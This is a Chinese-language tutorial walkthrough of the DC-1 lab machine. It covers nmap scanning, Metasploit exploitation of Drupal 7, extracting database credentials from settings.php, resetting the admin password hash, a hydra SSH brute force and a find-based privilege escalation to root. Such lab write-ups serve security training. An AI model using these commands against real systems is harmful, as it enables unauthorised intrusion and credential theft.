DC-1 靶机渗透测试详细教学文档

1. 信息收集

1.1 网络扫描

使用nmap对当前网段进行扫描：

nmap 192.168.84.0/24

发现目标IP 192.168.84.141 开放了80端口。

1.2 Web服务识别

通过浏览器访问80端口，发现是由CMS搭建的网站。使用Wappalyzer插件识别出是Drupal 7框架。

2. 漏洞利用

2.1 搜索Drupal 7漏洞

使用Metasploit框架搜索Drupal 7存在的漏洞：

msfconsole
search Drupal 7

使用info <ID>查看具体漏洞信息。

2.2 选择并配置漏洞利用模块

选择适合的漏洞利用模块：

use <模块ID>
show options
set RHOSTS 192.168.84.141
run

成功获取shell。

3. 系统信息收集

3.1 基本信息

sysinfo
pwd
ls

3.2 查找flag1

cat flag1.txt

4. 数据库信息获取

4.1 查找配置文件

在/var/www/sites/default/settings.php文件中找到flag2和数据库凭据：

db=drupaldb
username=dbuser
password="R0ck3t"

4.2 获取交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

5. 数据库操作

5.1 登录MySQL

mysql -u dbuser -pR0ck3t

5.2 密码重置

1. 使用Drupal的password-hash.sh脚本生成新密码哈希：

cd /var/www
php scripts/password-hash.sh admin

2. 更新admin用户密码：

UPDATE users SET pass='$S$DfBIXCmF.dJ5Ky2bWAMukxpsipRCGvQmXC.jnlUMbGIbySLzw7a0' WHERE name='admin';

6. Web后台访问

使用账号密码admin/admin登录网站，在content功能点中找到flag3。

7. 系统用户枚举

7.1 查找flag4

cd /home
ls
cat flag4

7.2 检查用户

cat /etc/passwd

发现flag4用户。

8. SSH爆破

使用hydra爆破flag4用户密码：

hydra -l flag4 -P /usr/share/wordlists/rockyou.txt.gz ssh://192.168.84.141

成功爆破后登录：

ssh flag4@192.168.84.141

9. 权限提升

9.1 使用find命令提权

find -name <文件名> -exec /bin/sh \;
find ./ <文件名> -exec '/bin/sh' \;

9.2 获取最终flag

切换到root家目录：

cd /root
cat thefinalflag.txt

总结

本渗透测试过程涵盖了从信息收集、漏洞利用、数据库操作到权限提升的完整流程，展示了如何利用Drupal 7的已知漏洞获取系统访问权限，并通过密码重置和提权技术最终获取root权限。